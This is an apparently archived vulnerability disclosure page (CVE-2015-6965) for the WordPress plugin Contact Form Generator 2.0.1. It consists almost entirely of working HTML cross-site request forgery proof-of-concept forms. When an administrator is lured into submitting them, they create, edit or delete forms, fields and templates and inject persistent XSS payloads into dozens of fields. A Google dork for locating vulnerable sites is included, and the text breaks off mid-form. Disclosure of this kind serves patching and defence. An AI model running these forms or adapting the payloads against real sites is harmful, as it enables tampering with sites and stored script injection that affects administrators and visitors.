Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

WordPress Plugin Contact Form Generator 2.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities

Related Vulnerabilities: CVE-2015-6965  
Publish Date: 06 Sep 2015
Author: i0akiN SEC-LABORATORY
Source / Download Exploit 
                							

                <html>
  <!--
  # Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update field for contact form) CSRF and Persistent issue
  # Date: 2015-09-04
  # Google Dork: Index of /wp-content/plugins/contact-form-generator/
  # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
  # Vendor Homepage: http://creative-solutions.net/
  # plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
  # Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
  # Version: 2.0.1
  # Tested on: windows 10 + firefox. 

  ======================
    Description (plugin)
  ======================
  Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
  form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
  template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
  (copy of ´contactformgenerator.php´ file)
  ===================
   TECHNICAL DETAILS
  ===================
  A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
  The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.

  form field creation: when the victim accesses the sent link, will create a new form and inject HTML / JS code
  without knowing.

  Update form field: when the victim accesses the link, will update information of the form identified for ´id´
  parameter by injecting HTML / JS code.

  -->
  <!--
  ================================
   Field form creation [CSRF PoC]
  ================================
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
      <input type="hidden" name="name" value=">"<img src=x>" />
      <input type="hidden" name="id_form" value="8" /> <!-- an existing form id value for this element -->
      <input type="hidden" name="id_type" value="1" />
      <input type="hidden" name="task" value="save" />
      <input type="hidden" name="id" value="0" />
      <input type="submit" value="Click me for create a field" />
    </form>
  </body>
 <!--
  ================================
   Field form update [CSRF PoC]
  ================================
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
      <input type="hidden" name="name" value="s" onmouseover="alert(/i0-sec/)" a=" />
      <input type="hidden" name="tooltip_text" value="s" onmouseover="alert(/i0-sec/)" a=" />
      
      <input type="hidden" name="id_form" value="3" /> <!-- an existing form id value -->
      
      <input type="hidden" name="id_type" value="1" />
      <input type="hidden" name="column_type" value="0" />
      <input type="hidden" name="required" value="0" />
      <input type="hidden" name="published" value="1" />
      <input type="hidden" name="width" value="s" onmouseover="alert(/i0-sec/)" a=" />
      <input type="hidden" name="field_margin_top" value="s" onmouseover="alert(/i0-sec/)" a=" />
      <input type="hidden" name="task" value="save" />

      <input type="hidden" name="id" value="7" />  <!-- field id to edit -->

      <input type="submit" value="Click me for update a field" />
    </form>
  </body>
</html>
<!--
  2015-09-02: vulnerability found
  2015-09-04: Reported to vendor
  2015-09-04: Full disclosure  
-->

<html>
  <!--
  # Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update form) CSRF and Persistent issue
  # Date: 2015-09-04
  # Google Dork: Index of /wp-content/plugins/contact-form-generator/
  # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
  # Vendor Homepage: http://creative-solutions.net/
  # plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
  # Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
  # Version: 2.0.1
  # Tested on: windows 10 + firefox. 

  ======================
    Description (plugin)
  ======================
  Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
  form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
  template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
  (copy of ´contactformgenerator.php´ file)
  ===================
   TECHNICAL DETAILS
  ===================
  A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
  The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.

  template creation: when the victim accesses the sent link, will create a new form and inject HTML / JS code
  without knowing.

  Update form: when the victim accesses the link, will update information of the form identified for ´id´
  parameter by injecting HTML / JS code.
  -->
   <!-- 
  =========================
   Create form [CSRF PoC ]
  =========================
  payload: "><img src=[x]><
  -->

  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
      <input type="hidden" name="name" value="dsSASA"><img src=1><" />
      <input type="hidden" name="top_text" value="xds"><img src=2><" />
      <input type="hidden" name="pre_text" value="</textarea>"><img src=3><" />
      <input type="hidden" name="thank_you_text" value="Message successfully sent"><img src=4><" />
      <input type="hidden" name="send_text" value="Send"><img src=5><" />
      <input type="hidden" name="send_new_text" value="New email"><img src=6><" />
      <input type="hidden" name="close_alert_text" value="Close"><img src=7><" />
      <input type="hidden" name="form_width" value="100%"><img src=8><" />
      <input type="hidden" name="id_template" value="0" /> 
      <input type="hidden" name="email_to" value=""><img src=9><" />
      <input type="hidden" name="email_bcc" value=""><img src=10><" />
      <input type="hidden" name="email_subject" value=""><img src=11><" />
      <input type="hidden" name="email_from" value=""><img src=12><" />
      <input type="hidden" name="email_from_name" value=""><img src=13><" />
      <input type="hidden" name="email_replyto" value=""><img src=14><" />
      <input type="hidden" name="email_replyto_name" value=""><img src=15><" />
      <input type="hidden" name="redirect" value="0" />
      <input type="hidden" name="redirect_itemid" value="2"><img src=17><" />
      <input type="hidden" name="redirect_url" value=""><img src=16><" />
      <input type="hidden" name="redirect_delay" value="0" />
      <input type="hidden" name="send_copy_enable" value="1" />
      <input type="hidden" name="send_copy_text" value="Send me a copy"><img src=17><" />
      <input type="hidden" name="shake_count" value="2" />
      <input type="hidden" name="shake_distanse" value="10" />
      <input type="hidden" name="shake_duration" value="300" />
      <input type="hidden" name="email_info_show_referrer" value="1" />
      <input type="hidden" name="email_info_show_ip" value="1" />
      <input type="hidden" name="email_info_show_browser" value="1" />
      <input type="hidden" name="email_info_show_os" value="1" />
      <input type="hidden" name="email_info_show_sc_res" value="1" />
      <input type="hidden" name="show_back" value="1" />
      <input type="hidden" name="published" value="1" />
      <input type="hidden" name="custom_css" value="</textarea>"><img src=21><" />
      <input type="hidden" name="task" value="save" />
      <input type="hidden" name="id" value="0" /> 
      <input type="submit" value="Click me for create a form" />
    </form>
  </body>
  <!-- 
  ==========================
    Update form [CSRF PoC ]
  ==========================
  payload: "><img src=[x]><
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
      <input type="hidden" name="name" value="dsSASA"><img src=1><" />
      <input type="hidden" name="top_text" value="xds"><img src=2><" />
      <input type="hidden" name="pre_text" value="</textarea>"><img src=3><" />
      <input type="hidden" name="thank_you_text" value="Message successfully sent"><img src=4><" />
      <input type="hidden" name="send_text" value="Send"><img src=5><" />
      <input type="hidden" name="send_new_text" value="New email"><img src=6><" />
      <input type="hidden" name="close_alert_text" value="Close"><img src=7><" />
      <input type="hidden" name="form_width" value="100%"><img src=8><" />
      <input type="hidden" name="id_template" value="0" /> 
      <input type="hidden" name="email_to" value=""><img src=9><" />
      <input type="hidden" name="email_bcc" value=""><img src=10><" />
      <input type="hidden" name="email_subject" value=""><img src=11><" />
      <input type="hidden" name="email_from" value=""><img src=12><" />
      <input type="hidden" name="email_from_name" value=""><img src=13><" />
      <input type="hidden" name="email_replyto" value=""><img src=14><" />
      <input type="hidden" name="email_replyto_name" value=""><img src=15><" />
      <input type="hidden" name="redirect" value="0" />
      <input type="hidden" name="redirect_itemid" value="2"><img src=17><" />
      <input type="hidden" name="redirect_url" value=""><img src=16><" />
      <input type="hidden" name="redirect_delay" value="0" />
      <input type="hidden" name="send_copy_enable" value="1" />
      <input type="hidden" name="send_copy_text" value="Send me a copy"><img src=17><" />
      <input type="hidden" name="shake_count" value="2" />
      <input type="hidden" name="shake_distanse" value="10" />
      <input type="hidden" name="shake_duration" value="300" />
      <input type="hidden" name="email_info_show_referrer" value="1" />
      <input type="hidden" name="email_info_show_ip" value="1" />
      <input type="hidden" name="email_info_show_browser" value="1" />
      <input type="hidden" name="email_info_show_os" value="1" />
      <input type="hidden" name="email_info_show_sc_res" value="1" />
      <input type="hidden" name="show_back" value="1" />
      <input type="hidden" name="published" value="1" />
      <input type="hidden" name="custom_css" value="</textarea>"><img src=21><" />
      <input type="hidden" name="task" value="save" />
      <input type="hidden" name="id" value="0" /> 
      <input type="submit" value="Click me for edit form" />
    </form>
  </body>
</html>
<!--
  ===========
   TIMELINE
  ===========
  2015-09-02: vulnerability found
  2015-09-04: Reported to vendor
  2015-09-04: Full disclosure
-->

<html>
  <!--
  # Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update template for contact form) CSRF and Persistent issue
  # Date: 2015-09-04
  # Google Dork: Index of /wp-content/plugins/contact-form-generator/
  # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
  # Vendor Homepage: http://creative-solutions.net/
  # plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
  # Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
  # Version: 2.0.1
  # Tested on: windows 10 + firefox. 

  ======================
    Description (plugin)
  ======================
  Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
  form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
  template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
  (copy of ´contactformgenerator.php´ file)
  ===================
   TECHNICAL DETAILS
  ===================
  A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
  The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.

  template creation: when the victim accesses the sent link, will create a new template and inject HTML / JS code
  without knowing.

  Update template: when the victim accesses the link, will update information of the template identified for ´id´
  parameter by injecting HTML / JS code.

  -->
  <!-- 
  ==============================
  create a template [CSRF PoC ]
  ==============================
  payload: "><img src=x>
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
      <input type="hidden" name="name" value="xsa"><img src=x>" />  <!-- persistent form name [XSS] -->
      <input type="hidden" name="published" value="1" />
      <input type="hidden" name="task" value="save" />
      <input type="hidden" name="id" value="0" />
      <input type="submit" value="Click me for add new template" />
    </form>
  </body>
  <!-- 
  ==============================
  edit a template [CSRF PoC ]
  ==============================
  payload: "><img src=x>
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
      <input type="hidden" name="name" value=""><img src=x>" />
      <input type="hidden" name="styles[587]" value=""><img src=x>" />
      <input type="hidden" name="styles[588]" value=""><img src=x>" />
      <input type="hidden" name="styles[131]" value="inherit" />
      <input type="hidden" name="styles[589]" value="1" />
      <input type="hidden" name="styles[629]" value="dark-thin" />
      <input type="hidden" name="styles[630]" value="dark-thin" />
      <input type="hidden" name="styles[627]" value="0" />
      <input type="hidden" name="styles[0]" value=""><img src=x>" />
      <input type="hidden" name="styles[130]" value=""><img src=x>" />
      <input type="hidden" name="styles[517]" value=""><img src=x>" />
      <input type="hidden" name="styles[518]" value=""><img src=x>" />
      <input type="hidden" name="styles[1]" value=""><img src=x>" />
      <input type="hidden" name="styles[2]" value=""><img src=x>" />
      <input type="hidden" name="styles[3]" value="solid" />
      <input type="hidden" name="styles[4]" value=""><img src=x>" />
      <input type="hidden" name="styles[5]" value=""><img src=x>" />
      <input type="hidden" name="styles[6]" value=""><img src=x>" />
      <input type="hidden" name="styles[7]" value=""><img src=x>" />
      <input type="hidden" name="styles[8]" value=""><img src=x>" />
      <input type="hidden" name="styles[9]" value=""><img src=x>" />
      <input type="hidden" name="styles[10]" value=""><img src=x>" />
      <input type="hidden" name="styles[11]" value=""><img src=x>" />
      <input type="hidden" name="styles[12]" value=""><img src=x>" />
      <input type="hidden" name="styles[13]" value=""><img src=x>" />
      <input type="hidden" name="styles[14]" value=""><img src=x>" />
      <input type="hidden" name="styles[15]" value=""><img src=x>" />
      <input type="hidden" name="styles[16]" value=""><img src=x>" />
      <input type="hidden" name="styles[17]" value=""><img src=x>" />
      <input type="hidden" name="styles[18]" value=""><img src=x>" />
      <input type="hidden" name="styles[19]" value=""><img src=x>" />
      <input type="hidden" name="styles[600]" value="0" />
      <input type="hidden" name="styles[601]" value=""><img src=x>" />
      <input type="hidden" name="styles[602]" value=""><img src=x>" />
      <input type="hidden" name="styles[603]" value=""><img src=x>" />
      <input type="hidden" name="styles[604]" value=""><img src=x>" />
      <input type="hidden" name="styles[605]" value=""><img src=x>" />
      <input type="hidden" name="styles[606]" value=""><img src=x>" />
      <input type="hidden" name="styles[607]" value=""><img src=x>" />
      <input type="hidden" name="styles[608]" value="solid" />
      <input type="hidden" name="styles[609]" value=""><img src=x>" />
      <input type="hidden" name="styles[610]" value="0" />
      <input type="hidden" name="styles[611]" value=""><img src=x>" />
      <input type="hidden" name="styles[612]" value=""><img src=x>" />
      <input type="hidden" name="styles[613]" value=""><img src=x>" />
      <input type="hidden" name="styles[614]" value=""><img src=x>" />
      <input type="hidden" name="styles[615]" value=""><img src=x>" />
      <input type="hidden" name="styles[616]" value=""><img src=x>" />
      <input type="hidden" name="styles[617]" value="0" />
      <input type="hidden" name="styles[618]" value=""><img src=x>" />
      <input type="hidden" name="styles[619]" value=""><img src=x>" />
      <input type="hidden" name="styles[620]" value=""><img src=x>" />
      <input type="hidden" name="styles[621]" value=""><img src=x>" />
      <input type="hidden" name="styles[622]" value=""><img src=x>" />
      <input type="hidden" name="styles[623]" value=""><img src=x>" />
      <input type="hidden" name="styles[624]" value=""><img src=x>" />
      <input type="hidden" name="styles[625]" value="solid" />
      <input type="hidden" name="styles[626]" value=""><img src=x>" />
      <input type="hidden" name="styles[20]" value=""><img src=x>" />
      <input type="hidden" name="styles[21]" value=""><img src=x>" />
      <input type="hidden" name="styles[22]" value="normal" />
      <input type="hidden" name="styles[23]" value="normal" />
      <input type="hidden" name="styles[24]" value="none" />
      <input type="hidden" name="styles[25]" value="left" />
      <input type="hidden" name="styles[506]" value="inherit" />
      <input type="hidden" name="styles[510]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[27]" value=""><img src=x>" />
      <input type="hidden" name="styles[28]" value=""><img src=x>" />
      <input type="hidden" name="styles[29]" value=""><img src=x>" />
      <input type="hidden" name="styles[30]" value=""><img src=x>" />
      <input type="hidden" name="styles[190]" value=""><img src=x>" />
      <input type="hidden" name="styles[191]" value=""><img src=x>" />
      <input type="hidden" name="styles[192]" value=""><img src=x>" />
      <input type="hidden" name="styles[502]" value="left" />
      <input type="hidden" name="styles[193]" value=""><img src=x>" />
      <input type="hidden" name="styles[194]" value=""><img src=x>" />
      <input type="hidden" name="styles[195]" value=""><img src=x>" />
      <input type="hidden" name="styles[196]" value="solid" />
      <input type="hidden" name="styles[197]" value=""><img src=x>" />
      <input type="hidden" name="styles[198]" value=""><img src=x>" />
      <input type="hidden" name="styles[199]" value="normal" />
      <input type="hidden" name="styles[200]" value="normal" />
      <input type="hidden" name="styles[201]" value="none" />
      <input type="hidden" name="styles[202]" value="inherit" />
      <input type="hidden" name="styles[511]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[203]" value=""><img src=x>" />
      <input type="hidden" name="styles[204]" value=""><img src=x>" />
      <input type="hidden" name="styles[205]" value=""><img src=x>" />
      <input type="hidden" name="styles[206]" value=""><img src=x>" />
      <input type="hidden" name="styles[215]" value=""><img src=x>" />
      <input type="hidden" name="styles[216]" value=""><img src=x>" />
      <input type="hidden" name="styles[217]" value=""><img src=x>" />
      <input type="hidden" name="styles[218]" value=""><img src=x>" />
      <input type="hidden" name="styles[31]" value=""><img src=x>" />
      <input type="hidden" name="styles[32]" value=""><img src=x>" />
      <input type="hidden" name="styles[33]" value="normal" />
      <input type="hidden" name="styles[34]" value="normal" />
      <input type="hidden" name="styles[35]" value="none" />
      <input type="hidden" name="styles[36]" value="left" />
      <input type="hidden" name="styles[507]" value="inherit" />
      <input type="hidden" name="styles[512]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[37]" value=""><img src=x>" />
      <input type="hidden" name="styles[38]" value=""><img src=x>" />
      <input type="hidden" name="styles[39]" value=""><img src=x>" />
      <input type="hidden" name="styles[40]" value=""><img src=x>" />
      <input type="hidden" name="styles[41]" value=""><img src=x>" />
      <input type="hidden" name="styles[42]" value=""><img src=x>" />
      <input type="hidden" name="styles[43]" value="normal" />
      <input type="hidden" name="styles[44]" value="normal" />
      <input type="hidden" name="styles[509]" value="inherit" />
      <input type="hidden" name="styles[46]" value=""><img src=x>" />
      <input type="hidden" name="styles[47]" value=""><img src=x>" />
      <input type="hidden" name="styles[48]" value=""><img src=x>" />
      <input type="hidden" name="styles[49]" value=""><img src=x>" />
      <input type="hidden" name="styles[505]" value="white" />
      <input type="hidden" name="styles[508]" value="inherit" />
      <input type="hidden" name="styles[132]" value=""><img src=x>" />
      <input type="hidden" name="styles[133]" value=""><img src=x>" />
      <input type="hidden" name="styles[168]" value=""><img src=x>" />
      <input type="hidden" name="styles[519]" value=""><img src=x>" />
      <input type="hidden" name="styles[520]" value=""><img src=x>" />
      <input type="hidden" name="styles[500]" value="left" />
      <input type="hidden" name="styles[501]" value="left" />
      <input type="hidden" name="styles[134]" value=""><img src=x>" />
      <input type="hidden" name="styles[135]" value=""><img src=x>" />
      <input type="hidden" name="styles[136]" value="solid" />
      <input type="hidden" name="styles[137]" value=""><img src=x>" />
      <input type="hidden" name="styles[138]" value=""><img src=x>" />
      <input type="hidden" name="styles[139]" value=""><img src=x>" />
      <input type="hidden" name="styles[140]" value=""><img src=x>" />
      <input type="hidden" name="styles[141]" value=""><img src=x>" />
      <input type="hidden" name="styles[142]" value=""><img src=x>" />
      <input type="hidden" name="styles[143]" value=""><img src=x>" />
      <input type="hidden" name="styles[144]" value=""><img src=x>" />
      <input type="hidden" name="styles[145]" value=""><img src=x>" />
      <input type="hidden" name="styles[146]" value=""><img src=x>" />
      <input type="hidden" name="styles[147]" value=""><img src=x>" />
      <input type="hidden" name="styles[148]" value=""><img src=x>" />
      <input type="hidden" name="styles[149]" value="normal" />
      <input type="hidden" name="styles[150]" value="normal" />
      <input type="hidden" name="styles[151]" value="none" />
      <input type="hidden" name="styles[152]" value="inherit" />
      <input type="hidden" name="styles[153]" value=""><img src=x>" />
      <input type="hidden" name="styles[154]" value=""><img src=x>" />
      <input type="hidden" name="styles[155]" value=""><img src=x>" />
      <input type="hidden" name="styles[156]" value=""><img src=x>" />
      <input type="hidden" name="styles[157]" value=""><img src=x>" />
      <input type="hidden" name="styles[158]" value=""><img src=x>" />
      <input type="hidden" name="styles[159]" value=""><img src=x>" />
      <input type="hidden" name="styles[160]" value=""><img src=x>" />
      <input type="hidden" name="styles[161]" value=""><img src=x>" />
      <input type="hidden" name="styles[162]" value=""><img src=x>" />
      <input type="hidden" name="styles[163]" value=""><img src=x>" />
      <input type="hidden" name="styles[164]" value=""><img src=x>" />
      <input type="hidden" name="styles[165]" value=""><img src=x>" />
      <input type="hidden" name="styles[166]" value=""><img src=x>" />
      <input type="hidden" name="styles[167]" value=""><img src=x>" />
      <input type="hidden" name="styles[513]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[176]" value=""><img src=x>" />
      <input type="hidden" name="styles[177]" value=""><img src=x>" />
      <input type="hidden" name="styles[178]" value=""><img src=x>" />
      <input type="hidden" name="styles[179]" value=""><img src=x>" />
      <input type="hidden" name="styles[180]" value=""><img src=x>" />
      <input type="hidden" name="styles[181]" value=""><img src=x>" />
      <input type="hidden" name="styles[182]" value=""><img src=x>" />
      <input type="hidden" name="styles[183]" value=""><img src=x>" />
      <input type="hidden" name="styles[184]" value=""><img src=x>" />
      <input type="hidden" name="styles[185]" value=""><img src=x>" />
      <input type="hidden" name="styles[186]" value=""><img src=x>" />
      <input type="hidden" name="styles[187]" value=""><img src=x>" />
      <input type="hidden" name="styles[188]" value=""><img src=x>" />
      <input type="hidden" name="styles[189]" value=""><img src=x>" />
      <input type="hidden" name="styles[171]" value=""><img src=x>" />
      <input type="hidden" name="styles[514]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[172]" value=""><img src=x>" />
      <input type="hidden" name="styles[173]" value=""><img src=x>" />
      <input type="hidden" name="styles[174]" value=""><img src=x>" />
      <input type="hidden" name="styles[175]" value=""><img src=x>" />
      <input type="hidden" name="styles[169]" value=""><img src=x>" />
      <input type="hidden" name="styles[521]" value=""><img src=x>" />
      <input type="hidden" name="styles[522]" value=""><img src=x>" />
      <input type="hidden" name="styles[170]" value=""><img src=x>" />
      <input type="hidden" name="styles[523]" value=""><img src=x>" />
      <input type="hidden" name="styles[535]" value=""><img src=x>" />
      <input type="hidden" name="styles[536]" value=""><img src=x>" />
      <input type="hidden" name="styles[537]" value=""><img src=x>" />
      <input type="hidden" name="styles[538]" value=""><img src=x>" />
      <input type="hidden" name="styles[539]" value=""><img src=x>" />
      <input type="hidden" name="styles[540]" value=""><img src=x>" />
      <input type="hidden" name="styles[541]" value=""><img src=x>" />
      <input type="hidden" name="styles[542]" value=""><img src=x>" />
      <input type="hidden" name="styles[543]" value=""><img src=x>" />
      <input type="hidden" name="styles[544]" value=""><img src=x>" />
      <input type="hidden" name="styles[545]" value=""><img src=x>" />
      <input type="hidden" name="styles[546]" value=""><img src=x>" />
      <input type="hidden" name="styles[547]" value="solid" />
      <input type="hidden" name="styles[548]" value=""><img src=x>" />
      <input type="hidden" name="styles[549]" value=""><img src=x>" />
      <input type="hidden" name="styles[550]" value=""><img src=x>" />
      <input type="hidden" name="styles[551]" value=""><img src=x>" />
      <input type="hidden" name="styles[524]" value=""><img src=x>" />
      <input type="hidden" name="styles[525]" value=""><img src=x>" />
      <input type="hidden" name="styles[526]" value="normal" />
      <input type="hidden" name="styles[527]" value="normal" />
      <input type="hidden" name="styles[528]" value="none" />
      <input type="hidden" name="styles[529]" value="inherit" />
      <input type="hidden" name="styles[530]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[531]" value=""><img src=x>" />
      <input type="hidden" name="styles[532]" value=""><img src=x>" />
      <input type="hidden" name="styles[533]" value=""><img src=x>" />
      <input type="hidden" name="styles[534]" value=""><img src=x>" />
      <input type="hidden" name="styles[91]" value=""><img src=x>" />
      <input type="hidden" name="styles[50]" value=""><img src=x>" />
      <input type="hidden" name="styles[212]" value="left" />
      <input type="hidden" name="styles[92]" value=""><img src=x>" />
      <input type="hidden" name="styles[93]" value=""><img src=x>" />
      <input type="hidden" name="styles[209]" value=""><img src=x>" />
      <input type="hidden" name="styles[100]" value=""><img src=x>" />
      <input type="hidden" name="styles[101]" value=""><img src=x>" />
      <input type="hidden" name="styles[127]" value="solid" />
      <input type="hidden" name="styles[102]" value=""><img src=x>" />
      <input type="hidden" name="styles[103]" value=""><img src=x>" />
      <input type="hidden" name="styles[104]" value=""><img src=x>" />
      <input type="hidden" name="styles[105]" value=""><img src=x>" />
      <input type="hidden" name="styles[94]" value=""><img src=x>" />
      <input type="hidden" name="styles[95]" value=""><img src=x>" />
      <input type="hidden" name="styles[96]" value=""><img src=x>" />
      <input type="hidden" name="styles[97]" value=""><img src=x>" />
      <input type="hidden" name="styles[98]" value=""><img src=x>" />
      <input type="hidden" name="styles[99]" value=""><img src=x>" />
      <input type="hidden" name="styles[106]" value=""><img src=x>" />
      <input type="hidden" name="styles[107]" value=""><img src=x>" />
      <input type="hidden" name="styles[108]" value="normal" />
      <input type="hidden" name="styles[109]" value="normal" />
      <input type="hidden" name="styles[110]" value="none" />
      <input type="hidden" name="styles[112]" value="inherit" />
      <input type="hidden" name="styles[515]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[113]" value=""><img src=x>" />
      <input type="hidden" name="styles[114]" value=""><img src=x>" />
      <input type="hidden" name="styles[115]" value=""><img src=x>" />
      <input type="hidden" name="styles[116]" value=""><img src=x>" />
      <input type="hidden" name="styles[51]" value=""><img src=x>" />
      <input type="hidden" name="styles[52]" value=""><img src=x>" />
      <input type="hidden" name="styles[124]" value=""><img src=x>" />
      <input type="hidden" name="styles[516]" value="cfg_font_effect_none" />
      <input type="hidden" name="styles[125]" value=""><img src=x>" />
      <input type="hidden" name="styles[126]" value=""><img src=x>" />
      <input type="hidden" name="styles[117]" value=""><img src=x>" />
      <input type="hidden" name="styles[118]" value=""><img src=x>" />
      <input type="hidden" name="styles[119]" value=""><img src=x>" />
      <input type="hidden" name="styles[120]" value=""><img src=x>" />
      <input type="hidden" name="styles[121]" value=""><img src=x>" />
      <input type="hidden" name="styles[122]" value=""><img src=x>" />
      <input type="hidden" name="styles[552]" value="1" />
      <input type="hidden" name="styles[553]" value=""><img src=x>" />
      <input type="hidden" name="styles[554]" value=""><img src=x>" />
      <input type="hidden" name="styles[555]" value="normal" />
      <input type="hidden" name="styles[556]" value="normal" />
      <input type="hidden" name="styles[596]" value="none" />
      <input type="hidden" name="styles[590]" value=""><img src=x>" />
      <input type="hidden" name="styles[591]" value="solid" />
      <input type="hidden" name="styles[592]" value=""><img src=x>" />
      <input type="hidden" name="styles[558]" value=""><img src=x>" />
      <input type="hidden" name="styles[559]" value=""><img src=x>" />
      <input type="hidden" name="styles[560]" value=""><img src=x>" />
      <input type="hidden" name="styles[561]" value=""><img src=x>" />
      <input type="hidden" name="styles[563]" value="1" />
      <input type="hidden" name="styles[562]" value="1" />
      <input type="hidden" name="styles[597]" value=""><img src=x>" />
      <input type="hidden" name="styles[598]" value=""><img src=x>" />
      <input type="hidden" name="styles[564]" value=""><img src=x>" />
      <input type="hidden" name="styles[565]" value="normal" />
      <input type="hidden" name="styles[566]" value="normal" />
      <input type="hidden" name="styles[594]" value="none" />
      <input type="hidden" name="styles[567]" value=""><img src=x>" />
      <input type="hidden" name="styles[568]" value="solid" />
      <input type="hidden" name="styles[569]" value=""><img src=x>" />
      <input type="hidden" name="styles[570]" value=""><img src=x>" />
      <input type="hidden" name="styles[571]" value=""><img src=x>" />
      <input type="hidden" name="styles[572]" value=""><img src=x>" />
      <input type="hidden" name="styles[573]" value=""><img src=x>" />
      <input type="hidden" name="styles[574]" value=""><img src=x>" />
      <input type="hidden" name="styles[595]" value="none" />
      <input type="hidden" name="styles[575]" value=""><img src=x>" />
      <input type="hidden" name="styles[576]" value=""><img src=x>" />
      <input type="hidden" name="styles[577]" value=""><img src=x>" />
      <input type="hidden" name="styles[578]" value=""><img src=x>" />
      <input type="hidden" name="styles[579]" value=""><img src=x>" />
      <input type="hidden" name="styles[580]" value=""><img src=x>" />
      <input type="hidden" name="styles[581]" value="normal" />
      <input type="hidden" name="styles[582]" value="normal" />
      <input type="hidden" name="styles[593]" value="none" />
      <input type="hidden" name="styles[583]" value=""><img src=x>" />
      <input type="hidden" name="styles[584]" value=""><img src=x>" />
      <input type="hidden" name="styles[585]" value=""><img src=x>" />
      <input type="hidden" name="styles[586]" value=""><img src=x>" />
      <input type="hidden" name="styles[599]" value=""><img src=x>" />
      <input type="hidden" name="styles[628]" value=""><img src=x>" />
      <input type="hidden" name="task" value="save" />

      <input type="hidden" name="id" value="2" />	<!-- template id to edit -->

      <input type="submit" value="Click me for update template" />
    </form>
  </body>
</html>
<!--
  2015-09-02: vulnerability found
  2015-09-04: Reported to vendor
  2015-09-04: Full disclosure  
-->

<html>
  <!--
	# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (delete) Cross-site Request Forgery (CSRF) issues
	# Date: 2015-09-04
	# Google Dork: Index of /wp-content/plugins/contact-form-generator/
	# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
	# Vendor Homepage: http://creative-solutions.net/
	# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
	# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
	# Version: 2.0.1
	# Tested on: windows 10 + firefox. 

	==============
	  Description
	==============
	Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
	
	===================
	 TECHNICAL DETAILS
	===================
	A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
    The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin,
    making the victim administrator user deletes a form (PoC # 1), delete a form element (PoC # 2), or delete an existing template (PoC # 3).
  -->
  <!-- 
 	===============================
  	 delete a form  [CSRF PoC #1]
	===============================
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms" method="POST">
      <input type="hidden" name="filter_state" value="2" />
      <input type="hidden" name="filter_search" value="" />
       <!-- form id value.. -->
      <input type="hidden" name="ids[]" value="2" />      
      <!-- end -->
      <input type="hidden" name="task" value="delete" />
      <input type="submit" value="Delete form(s)" />
    </form>
  </body>
  <!-- 
 	===============================
  	 delete a field  [CSRF PoC #2]
	===============================
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_fields" method="POST">
      <input type="hidden" name="filter_form" value="3" />
      <input type="hidden" name="filter_state" value="2" />
      <input type="hidden" name="filter_type" value="0" />
      <input type="hidden" name="filter_search" value="" />

      <!-- fields ids to delete -->	
      <input type="hidden" name="ids[]" value="9" />
